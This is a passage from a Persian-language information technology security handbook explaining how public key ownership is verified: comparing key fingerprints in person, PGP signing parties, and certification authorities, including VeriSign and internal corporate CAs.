ﻋﻤﻮﻣﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺮﺩ ﻳﺎ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻧﺎﻣﺶ ﺭﻭﻱ ﻛﻠﻴﺪ ﺍﺳﺖ؟ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻧﺴﺒﺖ ﺑﻪ ﻳﻚ ﻣﺴﺌﻠﻪ ﻧـﺎﻣﻄﻤﺌﻦ ﻛـﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ
ﻛﺮﺩ؟ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻗﻮﺍﻧﻴﻦ ﻭ ﻓﺮﺍﻳﻨﺪﻫﺎﻱ ﻣﺸﺨﺺ ﺩﺭ ﺍﻳﺠﺎﺩ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﺩﻧﺒﺎﻝ ﻣﻲﺷﻮﻧﺪ ،ﺩﺭ ﻋﻤﻞ ﻣـﻲﺗـﻮﺍﻧﻴﻢ ﺩﺭ ﻣـﻮﺭﺩ
ﻫﻮﻳﺖ ﺻﺎﺣﺒﺎﻥ ﻛﻠﻴﺪﻫﺎ ﻭ ﺻﺤﺖ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛﻤﻲ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ.
ﺳﻪ ﺭﻭﺵ ﺍﺻﻠﻲ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻭﺍﻗﻌﹰﺎ ﺑﻪ ﻓﺮﺩﻱ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ ﻣﺎﻟﻚ ﺁﻥ ﺍﺳﺖ ﺗﻌﻠﻖ ﺩﺍﺭﺩ:
ﺗﺄﻳﻴﺪ ﺷﺨﺼﻲ ﺻﺤﺖ ﻛﻠﻴﺪ
ﻳﻚ ﺭﻭﺵ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ "ﺟﻴﻦ ﺗﺮﻭﻛﺎﺭﺩ" ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ ﺍﻧﺠﺎﻡ ﻣﻼﻗﺎﺕ ﺑﺎ ﺟﻴﻦ ﻭ ﺗﻘﺎﺿﺎ ﺍﺯ ﺍﻭ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ
ﻛﻠﻴﺪﺵ ﻭ ﻣﻘﺎﻳﺴﺔ ﺭﻗﻢ ﺑﻪ ﺭﻗﻢ ﻛﻠﻴﺪ ﺑﺎ ﺁﻥ ﭼﻴﺰﻱ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﺩﺍﺭﻳﺪ .ﺍﮔﺮ ﺷﻤﺎ ﺟﻴﻦ ﺭﺍ ﺑﺨﻮﺑﻲ ﺑﺸﻨﺎﺳﻴﺪ ﻭ ﻧﻴﺰ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺗﻠﻔـﻦ ﺍﻋﺘﻤـﺎﺩ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﻣﻘﺎﻳﺴﻪ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺗﻠﻔﻦ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ -ﺍﻣﺎ ﻧﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻳﻜﻨﻔـﺮ ﺑﺘﻮﺍﻧـﺪ
ﺍﻃﻼﻋﺎﺕ ﻋﻤﻠﻴﺎﺕ ﻣﻘﺎﻳﺴﻪ ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﺍﺭﻗﺎﻡ ﺭﺍ ﺑﺎ ﺭﻗﻤﻬﺎﻱ ﻳﻚ ﻛﻠﻴﺪ ﺟﻌﻠﻲ ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﺪ.
ﭼﻮﻥ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺯ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻃﻮﻻﻧﻲ ﺳﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ ،ﻣﻘﺎﻳﺴﺔ ﺭﻗﻢ ﺑﻪ ﺭﻗﻢ ﺁﻧﻬﺎ ﻛﺎﺭ ﺟﺎﻟﺒﻲ ﻧﻴﺴﺖ .ﺩﺭﻋﻮﺽ ﺷﻤﺎ ﻭ ﺟﻴﻦ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﺮﻛﺪﺍﻡ ﻳﻚ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺯ ﻛﻠﻴﺪ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ ﻭ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﺁﻥ ﺧﻼﺻﻪﻫﺎ ﺭﺍ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻘﺎﻳـﺴﻪ ﻧﻤﺎﻳﻴـﺪ .ﺍﻳـﻦ
133 Public Key Infrastructure
ﺑﺨﺶ ﭘﻨﺠﻢ
.١
.٢
.٣
ﻼ ﻣﻄﻤﺌﻦ ﺷﺪﻩ ﺑﺎﺷﻴﺪ.
ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﺧﻮﺩ ﻓﺮﺩ ﺑﮕﻴﺮﻳﺪ ﻭ ﺻﺤﺖ ﺁﻧﺮﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺑﻪ ﺗﺄﻳﻴﺪ ﺑﺮﺳﺎﻧﻴﺪ ﻛﻪ ﺍﺯ ﺁﻥ ﻛﺎﻣ ﹰ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻓﺮﺩ ﺩﻳﮕﺮ ﻛﻪ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺷﻤﺎﺳﺖ ﻛﻠﻴﺪ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ ﻭ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ،ﺻﺤﺖ ﻛﻠﻴﺪ ﺭﺍ ﮔﻮﺍﻫﻲ ﺩﺍﺩﻩ ﺍﺳﺖ.
٣٢٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻻ "ﺍﺛﺮ ﺍﻧﮕﺸﺖﻫﺎﻱ ﻛﻠﻴﺪ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ .ﺑﻌﻀﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ،ﺍﺛﺮ ﺍﻧﮕﺸﺖﻫﺎﻱ ﻛﻠﻴـﺪ ﺧـﻮﺩ ﺭﺍ ﺭﻭﻱ
ﺧﻼﺻﻪﻫﺎ ﻣﻌﻤﻮ ﹰ
ﻛﺎﺭﺗﻬﺎﻱ ﺗﺠﺎﺭﻳﺸﺎﻥ ﭼﺎﭖ ﻣﻲﻛﻨﻨﺪ ،ﻟﺬﺍ ﺍﮔﺮ ﺷﻤﺎ ﻛﺎﺭﺕ ﺗﺠﺎﺭﻱ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﺟﻴﻦ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻌﺪﹰﺍ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﻭ ﺭﺍ
downloadﻭ ﺻﺤﺖ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ.
ﺗﺼﺪﻳﻖ ﻛﻠﻴﺪﻫﺎﻱ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ
ﺯﻣﺎﻧﻴﻜﻪ ﻣﺘﻮﺟﻪ ﺷﺪﻳﺪ ﻛﻠﻴﺪ ﺟﻴﻦ ﻭﺍﻗﻌﹰﺎ ﻣﺘﻌﻠﻖ ﺑﻪ ﺧﻮﺩ ﺍﻭﺳﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺳﺎﻳﺮ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺭﺍ ﻛﻪ ﺟﻴﻦ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ
ﻣﻲﻛﻨﺪ ﺑﭙﺬﻳﺮﻳﺪ .ﺟﻴﻦ ﺑﺎ ﺍﻣﻀﺎﻱ ﻛﻠﻴﺪﻫﺎﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺧﻮﺩﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨـﺪ ،ﻭ ﺯﻣﺎﻧﻴﻜـﻪ ﺷـﻤﺎ ﻳـﻚ ﻛﻠﻴـﺪ
ﺍﻣﻀﺎﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺟﻴﻦ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ،ﻣﻄﻤﺌﻦ ﻫﺴﺘﻴﺪ ﻛﻪ ﺧﻮﺩ ﺟﻴﻦ ﺁﻧﺮﺍ ﺍﻣﻀﺎ ﻛﺮﺩﻩ ﺍﺳﺖ ،ﭼﻮﻥ ﻣﻲﺩﺍﻧﻴـﺪ ﻛﻠﻴـﺪ ﺟـﻴﻦ ﻣﻌﺘﺒـﺮ
ﺍﺳﺖ ﻭ ﻓﺮﺽ ﺭﺍ ﻧﻴﺰ ﺑﺮ ﺍﻳﻦ ﮔﺬﺍﺷﺘﻪﺍﻳﺪ ﻛﻪ ﺗﻨﻬﺎ ﺧﻮﺩ ﺍﻭ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ.
ﭘﺬﻳﺮﺵ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻛﻪ ﺟﻴﻦ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﺪ ﺑﺮ ﺍﺳﺎﺱ ﺍﻋﺘﺒﺎﺭ ﻛﻠﻴﺪ ﺟﻴﻦ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﺑﺮ ﺍﺳﺎﺱ ﻣﻴﺰﺍﻥ ﺍﻋﺘﻤﺎﺩﻱ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﺑـﻪ
ﺧﻮﺩ ﺟﻴﻦ ﺩﺍﺭﻳﺪ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻛﻪ ﺍﻣﻀﺎ ﻣﻲﻛﻨﺪ ﺩﻗﻴﻖ ﺑﺎﺷﺪ .ﺩﺭ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ،ﺍﻳﻦ ﺩﻭ ﻣﻔﻬﻮﻡ -ﺍﻋﺘﺒﺎﺭ ﻛﻠﻴﺪ
ﻭ ﺍﻋﺘﻤﺎﺩ ﺷﻤﺎ ﺑﻪ ﺻﺎﺣﺐ ﺁﻥ -ﻣﺴﺘﻘﻞ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﻫﺴﺘﻨﺪ .ﺩﺭ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ،ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﭘﻴﺶ ﺍﺯ ﻗﺒﻮﻝ ﻫﺮ ﻛﻠﻴﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﻠﻴـﺪ
ﻣﻌﺘﺒﺮ ،ﻣﻨﺘﻈﺮ ﺗﺄﻳﻴﺪ ﺩﻭ ﻳﺎ ﭼﻨﺪ ﻃﺮﻑ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺑﺎﺷﻴﺪ.
ﻻ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻀﺎ ١٣٤ﺩﺍﺭﻧﺪ ﺗﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻳﻜﺪﻳﮕﺮ ﺭﺍ ﺑﺮﺭﺳﻲ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺍﻣﻀﺎ ﻛﻨﻨﺪ .ﻳﻚ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺩﺭ
ﻛﺎﺭﺑﺮﺍﻥ PGPﻣﻌﻤﻮ ﹰ
ﭼﻨﻴﻦ ﮔﺮﻭﻫﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻩ ﻳﺎ ﺑﻴﺸﺘﺮ ﺍﻣﻀﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻳﻜﻨﻔﺮ ﺑﺘﻮﺍﻧﺪ ﺑﻌﺪﻫﺎ ﺍﺯ ﺁﻥ ﺍﻣﻀﺎﻫﺎ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺻـﺤﺖ ﺁﻥ ﻛﻠﻴـﺪ ﺍﺳـﺘﻔﺎﺩﻩ
ﻻ ﻛﻠﻴﺪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ PGPﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺗﻮﺯﻳﻊ ﻣﻲﻛﻨﻨﺪ؛ ﻭ ﻟﺬﺍ ﺯﻣﺎﻧﻴﻜﻪ
ﻛﻨﺪ .ﻛﺎﺭﺑﺮﺍﻥ PGPﻣﻌﻤﻮ ﹰ
ﻳﻚ ﻛﻠﻴﺪ ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻠﻴﺪ downloadﻣﻲﻛﻨﻴﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻣﻀﺎﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ ﺁﻳﺎ ﻣﻄﻤﺌﻦ ﻣﻲﺷـﻮﻳﺪ ﻛـﻪ ﻛﻠﻴـﺪ
ﻭﺍﻗﻌﹰﺎ ﻣﻌﺮﻑ ﻛﺴﻲ ﻛﻪ ﻣﺪﻋﻲ ﻣﺎﻟﻜﻴﺖ ﺁﻥ ﺍﺳﺖ ﻣﻲﺑﺎﺷﺪ ﻳﺎ ﻧﻪ.
ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ :ﻣﺘﺼﺪﻱﻫﺎﻱ ﺷﺨﺺ ﺛﺎﻟﺚ
ﻫﺮﭼﻨﺪ "ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻀﺎ" ﻳﻚ ﺭﻭﺵ ﺧﻮﺏ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻋﺘﻤﺎﺩ ﺍﻓﺮﺍﺩ ﺍﺳﺖ ،ﺍﻣﺎ ﺗﺠﺮﺑﻪ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺭﻭﺵ ﻋﻤﻠﻲ ﺑﺮﺍﻱ ﺍﻳﺠـﺎﺩ
ﻻ ﭘﻮﺷﺶ ﺁﻥ ﺑﺴﻴﺎﺭ ﻛﻢ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ .ﺑﻌـﻀﻲ
ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻣﻠﻲ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺗﺄﻳﻴﺪﺷﺪﻩ ﺑﺼﻮﺭﺕ ﺯﻧﺠﻴﺮﻩﺍﻱ ﻧﻴﺴﺖ ،ﭼﺮﺍﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺍﻓﺮﺍﺩ ﻭﻗﺖ ﺁﻧﺮﺍ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻀﺎ ﺑﺮﻭﻧﺪ .ﺑﻌﻼﻭﻩ ،ﺩﺍﺷﺘﻦ ﺍﻣﻀﺎﻱ ﻛﺴﻲ ﺭﻭﻱ ﻛﻠﻴﺪ ﻳﻚ ﻓﺮﺩ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺁﻥ ﺩﻭ ﻧﻔـﺮ
ﻳﻜﺪﻳﮕﺮ ﺭﺍ ﻣﻲﺷﻨﺎﺳﻨﺪ ،ﻳﺎ ﺣﺪﺍﻗﻞ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻼﻗﺎﺕ ﻛﺮﺩﻩﺍﻧﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ،ﺍﺳﺘﻔﺎﺩﺓ ﻭﺳﻴﻊ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ
ﺑﻪ ﻳﻚ ﺩﺭﺧﺖ ﮔﻮﺍﻫﻲﻫﺎ ﺧﺘﻢ ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ) ١٣٥(CAﺩﺭ ﺭﻳـﺸﺔ ﺁﻥ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ" .ﻣﺮﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ" ﻓـﺮﺩ ﻳـﺎ
ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻣﺠﻮﺯﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺭﺍ ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ.
ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻗﺒﻞ ﺍﺯ ﺍﻣﻀﺎﻱ ﻳﻚ ﻛﻠﻴﺪ ،ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺭﺍ ﻭﺿﻊ ﻛﻨﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ،ﻳـﻚ ﺩﺍﻧـﺸﮕﺎﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ ﻛﻪ ﺁﻥ ﻛﻠﻴﺪﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺁﻧﺮﺍ ﺍﻣﻀﺎ ﻛﻨﺪ ﻭﺍﻗﻌﹰﺎ ﺑﻪ ﻳﻚ ﺩﺍﻧﺸﺠﻮﻱ ﺣﻘﻴﻘﻲ ﺗﻌﻠﻖ ﺩﺍﺭﺩ ﻳﺎ ﻧﻪ .ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﻳﮕﺮ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻴﭻ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﺰﺭﮔﺘﺮﻳﻦ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺟﻬﺎﻥ - VeriSign -ﭼﻨﺪﻳﻦ ﻧﻮﻉ ﻣﺨﺘﻠﻒ ﮔﻮﺍﻫﻲ ﻣﻨﺘـﺸﺮ
ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﻣﺮﻛﺰ ﺗﺤﺖ ﺷﺒﻜﺔ ﻣﻄﻤﺌﻦ ١٣٦(VTN) VeriSignﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻋﻤـﻮﻡ ﺻـﺎﺩﺭ ﻣـﻲﻛﻨـﺪ .ﺍﻳـﻦ ﺷـﺮﻛﺖ
ﻫﻤﭽﻨﻴﻦ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺷﺮﻛﺘﻬﺎ ﺻﺎﺩﺭ ﻣﻲﻧﻤﺎﻳﺪ .ﭘﺎﺋﻴﻦﺗﺮﻳﻦ ﺳﻄﺢ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺻﺎﺩﺭ ﺷﺪﻩ ﺗﻮﺳﻂ VTNﻫـﻴﭻ ﺗـﻀﻤﻴﻨﻲ
ﺍﺭﺍﺋﻪ ﻧﻤﻲﻛﻨﻨﺪ ،ﺍﻣﺎ ﺑﺎﻻﺗﺮﻳﻦ ﺳﻄﻮﺡ ﺁﻥ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻛﻪ VTNﻗﺒﻞ ﺍﺯ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ،ﺻﺎﺣﺐ ﻛﻠﻴﺪ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﻀﺎ ﻣﻲﺷﻮﺩ ﻣﺎﻧﻨﺪ ﺷﻨﺎﺳﻨﺎﻣﻪ ﻣﻲﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻣﻀﺎ ﺷﺪﻩﺍﻧﺪ .ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﺷﺎﻣﻞ
ﺍﻃﻼﻋﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﻀﺎ ﺷﺪﻩ ﺍﺳﺖ ،ﻭ ﺍﻃﻼﻋـﺎﺗﻲ ﭼـﻮﻥ ﻧـﺎﻡ ﻣﺮﮐـﺰ،
134 Signing Parties
135 Certification Authority
136 VeriSign Trusted Network
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣٢١
ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﺮﮐﺰ ،ﻭ ﻧﻴﺰ ﻳﻚ ﺷﻤﺎﺭﻩ ﺳﺮﻳﺎﻝ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﻧﺪ .ﺗﺎ ﺍﻣﺮﻭﺯ ﺑﻴﺸﺘﺮﻳﻦ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔـﻮﺍﻫﻲ ،ﮔـﻮﺍﻫﻲﻫـﺎﻳﻲ
ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺧﺎﺹ ﺑﻪ ﻓﺮﺩ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺧﺎﺻﻲ ﺗﻌﻠﻖ ﺩﺍﺭﺩ .ﮔﻮﺍﻫﻲﻫﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺍﻱ ﺍﺛﺒـﺎﺕ
ﺑﻜﺎﺭ ﺭﻭﻧﺪ ،ﻣﺸﺎﺑﻪ ﻣﺜﺎﻝ ﺩﺍﻧﺸﮕﺎﻩ ﻛﻪ ﭘﻴﺸﺘﺮ ﺫﻛﺮ ﺷﺪ .ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺧﺪﻣﺎﺕ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﮐﺮﺩ:
ﻣﺮﮐﺰ ﺩﺍﺧﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ
ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺷﺎﻏﻠﻴﻦ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﻳـﻚ ﻣﺮﮐـﺰ ﺩﺍﺧﻠـﻲ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺎﻡ ،ﻣﻮﻗﻌﻴﺖ ،ﻭ ﺳﻄﺢ ﺍﺧﺘﻴﺎﺭ ﻳﻚ ﻓﺮﺩ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﺩ .ﺍﻳـﻦ ﮔـﻮﺍﻫﻲﻫـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺩﺍﺧـﻞ
ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺩﺍﺧﻠﻲ ﻭ ﮔﺮﺩﺵ ﺍﻃﻼﻋﺎﺕ ﺑﻜﺎﺭ ﺭﻭﻧﺪ .ﺍﻳﻦ ﻣﺮﮐﺰ ﺩﺍﺧﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﭘﺎﻳـﻪﺍﻱ ﺑـﺮﺍﻱ
ﺯﻳﺮﺳﺎﺧﺖ ﮐﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺳﺎﺯﻣﺎﻥ ﺑﺎﺷﺪ.
ﺷﺮﻛﺘﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻳﻚ ﻣﺮﮐﺰ ﺩﺍﺧﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻛﻪ ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ،
